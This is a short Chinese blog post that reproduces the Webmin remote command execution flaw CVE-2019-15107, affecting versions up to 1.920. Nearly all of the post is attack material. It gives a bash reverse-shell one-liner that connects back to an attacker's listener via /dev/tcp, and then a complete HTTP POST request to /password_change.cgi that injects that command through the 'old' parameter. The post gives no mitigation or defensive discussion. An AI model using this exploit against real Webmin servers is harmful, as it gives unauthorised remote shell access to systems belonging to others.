Webmin

1.漏洞复现

CVE-2019-15107

影响范围：Webmin <= 1.920

先用NC监听，使用以下请求包反弹shell

echo 'bash -i >& /dev/tcp/IP/端口 0>&1' > /tmp/shell;bash /tmp/shell

POST /password_change.cgi HTTP/1.1
Host: IP:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://IP与Host一致:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

user=hacker&pam=&expired=2&old=命令URL编码&new1=test2&new2=test2

posted @ 2023-01-17 02:16 Hacker&Cat 阅读(58) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Hacker&Cat

Webmin

公告